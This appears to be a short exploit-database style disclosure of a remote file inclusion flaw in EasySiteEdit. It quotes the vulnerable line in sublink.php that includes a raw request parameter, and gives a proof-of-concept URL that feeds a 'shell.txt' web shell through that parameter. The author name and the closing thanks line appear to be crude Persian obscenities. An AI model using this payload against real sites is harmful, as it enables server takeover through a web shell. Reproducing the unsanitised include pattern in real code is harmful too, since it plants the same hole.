14 lines
No EOL
440 B
Text
14 lines
No EOL
440 B
Text
# Exploit Title: EasySiteEdit remote file include
|
|
# Date:2011
|
|
# Author:koskesh jakesh
|
|
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
|
|
# Tested on: linux
|
|
-------------------------------
|
|
vul:sublink.php
|
|
line 20:
|
|
include($_REQUEST['langval']);
|
|
-------------------------------
|
|
poc:
|
|
site.com/path/sublink.php?langval=shell.txt?
|
|
--------------------------------
|
|
thanks:kire rostam,kose zan dait,kose shohar amat |